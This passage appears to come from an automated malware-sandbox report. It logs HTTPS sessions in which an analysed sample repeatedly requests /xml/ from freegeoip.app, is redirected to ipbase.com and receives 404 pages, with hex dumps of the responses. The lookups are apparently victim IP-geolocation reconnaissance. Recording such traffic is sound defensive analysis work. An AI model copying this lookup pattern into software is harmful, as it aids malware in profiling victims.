                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7886
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSRXBWXJT3NXKWXWETCGC
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tnBG7ySWoKU5GgryGcI9O5ue3PzHWTyiJl42fjXbDJZ6jp3HabKVOrJCQwoyxUfyBIW%2B0L0lDH%2FRzcI8K3uqj9cZx4z16dRlFtPp89%2FVsGmI8yLu7HB561bIOQnG"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2590c2836c413-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:05 UTC635INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:05 UTC1369INData Raw: 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30
                                      Data Ascii: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 10
                                      2024-09-06 23:48:05 UTC1085INData Raw: 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432949
                                      2024-09-06 23:48:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      28192.168.2.549758188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:06 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:06 UTC641INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:06 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:06 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oNGfPlm%2BGm8VioPapEb7%2Bv2wjwGgWPA8xt1phIjtVgC8J3%2B8n5A56XkhLuM%2FtQ53tpFXxScpdymFTuY7EW7o5FASmokEBJQaigkkNOY2KaplNKBQBVh8NYenLGyFWHPb"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25916b8fd195d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:06 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      29192.168.2.549759104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:07 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:07 UTC741INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:07 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 11911
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSV5E5313SEQY6ZHG5CHQ
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vRywUc7YIJj0qebfyDtc1z4K64ggV97l%2F6b9tGTss9%2BKuV70cSFcwrig9wQVLcKaHkQIhLBBISYkahvocNEUlgD2q7PzVCiq%2F5%2F0UvPrbK3lk%2BWzNKZpBaE%2BA1GZ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2591a8c151821-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:07 UTC628INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:07 UTC1369INData Raw: 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69
                                      Data Ascii: adding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; hei
                                      2024-09-06 23:48:07 UTC1092INData Raw: 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7
                                      2024-09-06 23:48:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      30192.168.2.549761188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:09 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:09 UTC639INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:09 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:09 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3DWKbLA1B6RB3OdXI9TVhPSU2hsN44HVCMSzQBS2%2Bq8yhq9V%2FU7MyC0E%2Fjb4r4kOXwkVForuQrSNA4rbQm76VtExX5qdS3ThKG50hSnt3IVIUm7vOc7H3miyFUjhvfpr"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25925bd81c3fa-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:09 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      31192.168.2.549763104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:09 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:09 UTC730INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:09 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7890
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSXG372MEWM1YJJZN85FS
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQMb07U8WhNxKBjU7pXvTXrpWf6fTE4ZD2Bkbc3Shn1nz6bKoaaS5TN6ymyC88M7f9tjPtqNl%2FC5ExApgZuCqwjcAHsgaS0xEmlkl8f0fj1Fa6vWO4NT3bJeFnfr"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259297c0d19f7-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:09 UTC639INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:09 UTC1369INData Raw: 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b
                                      Data Ascii: } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh;
                                      2024-09-06 23:48:09 UTC1081INData Raw: 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33 36 20 4c
                                      Data Ascii: th fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936 L
                                      2024-09-06 23:48:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      32192.168.2.549765188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:12 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:12 UTC643INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:12 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:12 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LP7Mf4QOMs%2BSxkp2CMwvUKlIxMQUf5pED7rsPdpDV8UxBAqZcYurhDKgV2dnqJKOcSNfhqryMhyz2%2Bs%2B9Y%2F6SFYaTPrtR1EXyj7xk2mtlgkVkhiocxZZ19Gba%2Bg5HgqY"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259395c5342b0-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:12 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      33192.168.2.549766104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:13 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:13 UTC735INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:13 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 33348
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VT0TNF2W8XG0BFFKKC1XB
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Pg6W3xpD1HJndM4VsTcZEpzDL9ypKDVZEgJ2cKwBlMBnSJ8rfJIDVcApTIO%2F4clyt%2BiW7zYRZlRhgG3yE3Ik%2FTTzI2IMpsV5ghDisL4DGHQURMqsxUDef1FrQbL"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2593ec95f4301-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:13 UTC634INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:13 UTC1369INData Raw: 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31
                                      Data Ascii: : 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 1
                                      2024-09-06 23:48:13 UTC1086INData Raw: 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294
                                      2024-09-06 23:48:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      34192.168.2.549768188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:16 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:16 UTC641INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:16 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:16 GMT
